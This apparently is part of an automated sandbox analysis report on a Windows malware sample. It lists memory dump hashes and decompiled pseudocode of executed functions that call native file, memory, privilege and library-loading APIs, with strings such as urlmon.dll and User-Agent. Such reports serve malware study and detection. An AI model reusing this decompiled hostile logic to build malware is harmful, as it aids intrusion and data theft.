                        0x00185c51
                        0x00185c57
                        0x00185c5b
                        0x00185c5e
                        0x00185c5f
                        0x00185c61
                        0x00185c62
                        0x00185c64
                        0x00185c67
                        0x00185c68
                        0x00185c6b
                        0x00185c71
                        0x00185c77
                        0x00185c7d
                        0x00185c83
                        0x00185c89
                        0x00185c8f
                        0x00185c92
                        0x00185c92
                        0x00185c93
                        0x00185c95
                        0x00185c9b
                        0x00185c9d
                        0x00185ca3
                        0x00185ca9
                        0x00185caf
                        0x00185cb5
                        0x00185cbb
                        0x00185cc1
                        0x00185cc3
                        0x00185cc7
                        0x00185cc9
                        0x00185ccd
                        0x00185ccf
                        0x00185cd5
                        0x00185cd7
                        0x00185cdd
                        0x00185ce0
                        0x00185ce7
                        0x00185cf0
                        0x00185cf1
                        0x00185cf7
                        0x00185cfb
                        0x00185d01
                        0x00185d09
                        0x00185d0b
                        0x00185d10
                        0x00185d13
                        0x00185d19
                        0x00185d1b
                        0x00185d1f
                        0x00185d25
                        0x00185d2b
                        0x00185d34
                        0x00185d35
                        0x00185d38
                        0x00185d3a
                        0x00185d3d
                        0x00185d3f
                        0x00185d46
                        0x00185d47
                        0x00185d49
                        0x00185d49
                        0x00185d4f
                        0x00185d52
                        0x00185d54
                        0x00185d55
                        0x00185d55
                        0x00185d56
                        0x00185d5d
                        0x00185d67
                        0x00185d6a
                        0x00185d6f
                        0x00185d71
                        0x00185d75
                        0x00185d76
                        0x00185d77
                        0x00185d7f
                        0x00185d81
                        0x00185d82
                        0x00185d84
                        0x00185d93

                        Memory Dump Source
                        • Source File: 00000000.00000002.255789430.0000000000182000.00000002.00020000.sdmp, Offset: 00180000, based on PE: true
                        • Associated: 00000000.00000002.255763940.0000000000180000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.255861817.000000000018F000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.255929899.000000000019A000.00000002.00020000.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ddf63220d3cbf9b0a417dad8c5c8b27fb19d33a253ee37ba99f4b112576f7f34
                        • Instruction ID: 6fafd7d8b06ae689d8219ac1ff28c17dc68805dcf3e3e0ae89b07433a01fd51e
                        • Opcode Fuzzy Hash: ddf63220d3cbf9b0a417dad8c5c8b27fb19d33a253ee37ba99f4b112576f7f34
                        • Instruction Fuzzy Hash: CD42DB6244E3D0AFD7438B744CA5A827FB0AE53214B2E45EBD4C1CF0E3E259595AC7A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12a1b31a8173e60e0370e6db987953abaf92acb0aa923cccea5c8d2d90bc6ce8
                        • Instruction ID: bcc92eb1dc34ade5eb38e3aacc2ffb4bc7c71817e686aaa0ae8943a57295dee1
                        • Opcode Fuzzy Hash: 12a1b31a8173e60e0370e6db987953abaf92acb0aa923cccea5c8d2d90bc6ce8
                        • Instruction Fuzzy Hash: 55516D74E406088FD744EFF9D891ADEBBF2EB85304F14CC69E004AB2A4DB749905DB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c8720ff00cd56b5e0681eac87c84ba25afc24ced054f8678bc7775e7a3f021b0
                        • Instruction ID: 42ee9f762309dcdc18c8b80eed1f07667005df510e503c62bc2ccd3b486afe54
                        • Opcode Fuzzy Hash: c8720ff00cd56b5e0681eac87c84ba25afc24ced054f8678bc7775e7a3f021b0
                        • Instruction Fuzzy Hash: 1E516D74E406488FD744EFF9E891ADEBBF2EB85304F14CC69E004AB2A4DB749905DB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4bfc7377ea1ee3674c76b7245a6133e96a4d29f081e95bb4c771a0f9e3bda0b
                        • Instruction ID: b2eda852036222de2a3d5924d75e0fd9953262e97b7b95848400d5210d1fb9fd
                        • Opcode Fuzzy Hash: b4bfc7377ea1ee3674c76b7245a6133e96a4d29f081e95bb4c771a0f9e3bda0b
                        • Instruction Fuzzy Hash: C14141B1E016198BEB5DCF6B8D4068AFAF7BFC8300F14C1BA851CAB254DB3059868F55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        C-Code - Quality: 23%
                        			E0041A40A(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                        				void* _t23;
                        				void* _t32;
                        				intOrPtr* _t34;
                        				void* _t36;
                        
                        				asm("invalid");
                        				_t18 = _a4;
                        				_t34 = _a4 + 0xc48;
                        				E0041AF60(_t32, _a4, _t34,  *((intOrPtr*)(_t18 + 0x10)), 0, 0x2a);
                        				_t5 =  &_a40; // 0x414a31
                        				_t7 =  &_a32; // 0x414d72
                        				_t13 =  &_a8; // 0x414d72
                        				_t23 =  *((intOrPtr*)( *_t34))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __esi, _t36); // executed
                        				return _t23;
                        			}







                        APIs
                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1JA$rMA$rMA
                        • API String ID: 2738559852-782607585
                        • Opcode ID: 168a3a6ba6aad3fbecb21687f97696ce2b573daee3d708162e6887467be85324
                        • Instruction ID: 4303057fbaaf29cad4171ea9010ed2377fecf0c0394d7fa1fb71fc5b5dab864a
                        • Opcode Fuzzy Hash: 168a3a6ba6aad3fbecb21687f97696ce2b573daee3d708162e6887467be85324
                        • Instruction Fuzzy Hash: 52F0C4B6200118AFCB14DF89DC81EEB77A9AF8C754F158248BA1DA7241C630E811CBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                        				void* _t18;
                        				void* _t27;
                        				intOrPtr* _t28;
                        
                        				_t13 = _a4;
                        				_t28 = _a4 + 0xc48;
                        				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                        				_t4 =  &_a40; // 0x414a31
                        				_t6 =  &_a32; // 0x414d72
                        				_t12 =  &_a8; // 0x414d72
                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                        				return _t18;
                        			}






                        APIs
                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: 1JA$rMA$rMA
                        • API String ID: 2738559852-782607585
                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 29%
                        			E0041A35A(void* __eax, void* __ebx, void* __eflags, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                        				intOrPtr _v0;
                        				long _t38;
                        				void* _t41;
                        				void* _t58;
                        				intOrPtr* _t60;
                        
                        				if(__eflags != 0) {
                        					_t60 = __eax + 0xc44;
                        					E0041AF60(_t58);
                        					return  *((intOrPtr*)( *_t60))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, __eax, _t60, _t41);
                        				} else {
                        					asm("scasd");
                        					_t32 = _v0;
                        					_t3 = _t32 + 0xc40; // 0xc40
                        					E0041AF60(_t58, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                        					_t38 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                        					return _t38;
                        				}
                        			}








                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                        • Instruction ID: 344b71f7b3a199d2ddbb085444571a9311c99876aed05395be72b1e04dcb046e
                        • Opcode Fuzzy Hash: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                        • Instruction Fuzzy Hash: DD11B4B2214109ABCB08DF99DC84CEB77ADFF8C358B15864DFA1D93215D634E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                        				long _t21;
                        				void* _t31;
                        
                        				_t3 = _a4 + 0xc40; // 0xc40
                        				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                        				return _t21;
                        			}





                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                        				long _t14;
                        				void* _t21;
                        
                        				_t3 = _a4 + 0xc60; // 0xca0
                        				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                        				return _t14;
                        			}





                        APIs
                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateMemoryVirtual
                        • String ID:
                        • API String ID: 2167126740-0
                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A490(intOrPtr _a4, void* _a8) {
                        				long _t8;
                        				void* _t11;
                        
                        				_t5 = _a4;
                        				_t2 = _t5 + 0x10; // 0x300
                        				_t3 = _t5 + 0xc50; // 0x40a943
                        				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                        				_t8 = NtClose(_a8); // executed
                        				return _t8;
                        			}





                        APIs
                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E0041A48A(void* __ebx, intOrPtr _a4, void* _a8) {
                        				long _t9;
                        				void* _t13;
                        
                        				gs =  *((intOrPtr*)(__ebx - 0x63));
                        				0x8bec();
                        				_t6 = _a4;
                        				_t3 = _t6 + 0x10; // 0x300
                        				_t4 = _t6 + 0xc50; // 0x40a943
                        				E0041AF60(_t13, _a4, _t4,  *_t3, 0, 0x2c);
                        				_t9 = NtClose(_a8); // executed
                        				return _t9;
                        			}





                        APIs
                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                        • Instruction ID: 6b97a5c630ec2685c44f67ab0c3518f250d9da488a99e2f68952f22904d5cf3e
                        • Opcode Fuzzy Hash: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                        • Instruction Fuzzy Hash: E2D02BA950E2C08BDB10FBB4E4D40CABB60EE8061C72859DFE4A807647D17592159391
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00409AB0(intOrPtr _a4) {
                        				intOrPtr _v8;
                        				char _v24;
                        				char _v284;
                        				char _v804;
                        				char _v840;
                        				void* _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t39;
                        				void* _t50;
                        				intOrPtr _t52;
                        				void* _t53;
                        				void* _t54;
                        				void* _t55;
                        				void* _t56;
                        
                        				_t52 = _a4;
                        				_t39 = 0; // executed
                        				_t24 = E00407EA0(_t52,  &_v24); // executed
                        				_t54 = _t53 + 8;
                        				if(_t24 != 0) {
                        					E004080B0( &_v24,  &_v840);
                        					_t55 = _t54 + 8;
                        					do {
                        						E0041BE10( &_v284, 0x104);
                        						E0041C480( &_v284,  &_v804);
                        						_t56 = _t55 + 0x10;
                        						_t50 = 0x4f;
                        						while(1) {
                        							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                        							_t56 = _t56 + 0x10;
                        							if(_t31 != 0) {
                        								break;
                        							}
                        							_t50 = _t50 + 1;
                        							if(_t50 <= 0x62) {
                        								continue;
                        							} else {
                        							}
                        							goto L8;
                        						}
                        						_t9 = _t52 + 0x14; // 0xffffe045
                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                        						_t39 = 1;
                        						L8:
                        						_t33 = E004080E0( &_v24,  &_v840);
                        						_t55 = _t56 + 8;
                        					} while (_t33 != 0 && _t39 == 0);
                        					_t34 = E00408160(_t52,  &_v24); // executed
                        					if(_t39 == 0) {
                        						asm("rdtsc");
                        						asm("rdtsc");
                        						_v8 = _t34 - 0 + _t34;
                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                        					}
                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                        					_t20 = _t52 + 0x31; // 0x5608758b
                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                        					return 1;
                        				} else {
                        					return _t24;
                        				}
                        			}



















                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 6EA
                        • API String ID: 1279760036-1400015478
                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 27%
                        			E0041A5F7(void* __eax, void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
                        				void* _t19;
                        				void* _t33;
                        				void* _t34;
                        				intOrPtr* _t36;
                        				void* _t38;
                        
                        				if(__ecx >  *__edx) {
                        					 *((intOrPtr*)(__ecx - 0x73)) =  *((intOrPtr*)(__ecx - 0x73)) + __edx;
                        					 *((intOrPtr*)(_t34 + 0x50)) =  *((intOrPtr*)(_t34 + 0x50)) + __edx;
                        					E0041AF60(_t33);
                        					_t12 =  &_a12; // 0x414536
                        					_t19 = RtlAllocateHeap( *_t12, _a16, _a20); // executed
                        					return _t19;
                        				} else {
                        					_t21 = _a4;
                        					_t3 = _t21 + 0xc6c; // 0xc6e
                        					_t36 = _t3;
                        					E0041AF60(_t33, _a4, _t36,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x33);
                        					return  *((intOrPtr*)( *_t36))(_a8, _a12, _t34, _t38);
                        				}
                        			}








                        APIs
                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 6EA
                        • API String ID: 1279760036-1400015478
                        • Opcode ID: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                        • Instruction ID: f8b0307e263f0a20d44079788cd30cb9ea9ec63190e6cfd16d2e7c5213453682
                        • Opcode Fuzzy Hash: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                        • Instruction Fuzzy Hash: 63E026F51082C45FD710DF34A8804C77BA4AE85308768818DF88803603C120C81286A1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                        				char _v67;
                        				char _v68;
                        				void* _t12;
                        				intOrPtr* _t13;
                        				int _t14;
                        				long _t21;
                        				intOrPtr* _t25;
                        				void* _t26;
                        				void* _t30;
                        
                        				_t30 = __eflags;
                        				_v68 = 0;
                        				E0041BE60( &_v67, 0, 0x3f);
                        				E0041CA00( &_v68, 3);
                        				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                        				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                        				_t25 = _t13;
                        				if(_t25 != 0) {
                        					_t21 = _a8;
                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                        					_t32 = _t14;
                        					if(_t14 == 0) {
                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                        					}
                        					return _t14;
                        				}
                        				return _t13;
                        			}












                        APIs
                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                        • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E0040ACE5(void* __eax, void* __ebx, void* __ecx, void* _a8) {
                        				void* _v4;
                        				void* _v8;
                        				void* _v12;
                        				void* _v536;
                        				void* _t15;
                        
                        				_t15 = __eax;
                        				asm("stc");
                        				if (__ebx + 1 <= 0) goto L7;
                        			}








                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction ID: 2939d7c89a7172a658210ab68ef3fead8153cd52e8a31b6efd872631f279e96f
                        • Opcode Fuzzy Hash: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction Fuzzy Hash: 24F06875E4020DABDF10DB95DC82FD9B378AF48308F0081A6E91D9B681F630DA59CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 64%
                        			E0041A7C2(signed int __eax, void* __ebx, void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                        				int _t13;
                        				void* _t21;
                        
                        				asm("les esi, [edx]");
                        				asm("lds esi, [0x769869b8]");
                        				 *(__ecx + 0x55197a7f) =  *(__ecx + 0x55197a7f) | __eax;
                        				_t10 = _a4;
                        				E0041AF60(_t21, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                        				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                        				return _t13;
                        			}





                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                        				char _t10;
                        				void* _t15;
                        
                        				_t3 = _a4 + 0xc74; // 0xc74
                        				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}






                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                        				int _t10;
                        				void* _t15;
                        
                        				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                        				return _t10;
                        			}






                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0041A6B0(intOrPtr _a4, int _a8) {
                        				void* _t10;
                        
                        				_t5 = _a4;
                        				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                        				ExitProcess(_a8);
                        			}





                        APIs
                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Us$: $er-A$gent$urlmon.dll
                        • API String ID: 0-1367105278
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: P
                        • API String ID: 0-3110715001
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        APIs
